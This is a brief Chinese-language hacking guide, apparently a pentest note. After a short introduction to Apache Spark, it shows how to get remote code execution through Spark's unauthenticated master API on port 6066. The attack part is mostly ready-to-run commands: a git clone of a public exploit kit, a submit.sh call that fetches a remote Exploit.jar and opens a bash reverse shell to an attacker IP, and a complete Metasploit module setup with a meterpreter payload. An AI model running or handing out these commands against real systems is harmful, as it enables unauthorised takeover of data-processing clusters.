Spark簡介
spark是一個實現快速通用的叢集計算平臺。它是由加州大學伯克利分校AMP實驗室 開發的通用記憶體平行計算框架,用來構建大型的、低延遲的資料分析應用程式。它擴充套件了廣泛使用的MapReduce計算模型。高效的支撐更多計算模式,包括互動式查詢和流處理。spark的一個主要特點是能夠在記憶體中進行計算,及時依賴磁碟進行復雜的運算,Spark依然比MapReduce更加高效。
Spark未授權
資訊探測
nmap掃描出先如下埠開放,則很有可能
6066/tcp open http Jetty 9.3.z-SNAPSHOT
8081/tcp open http Jetty 9.3.z-SNAPSHOT
8082/tcp open http Jetty 9.3.z-SNAPSHOT
驗證如圖
下載攻擊元件或使用MSF
下載地址:git clone https://github.com/aRe00t/rce-over-spark.git
jar工具使用說明
./submit.sh 192.168.100.2:6066 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1"
反彈shell效果:
msf工具
msf5>use exploit/linux/http/spark_unauth_rce
msf5>set payload java/meterpreter/reverse_tcp
msf5>set rhost 192.168.100.2
msf5>set rport 6066
msf5>set lhost 192.168.100.1
msf5>set lport 4444
msf5>set srvhost 192.168.100.1
msf5>set srvport 8080
msf5>exploit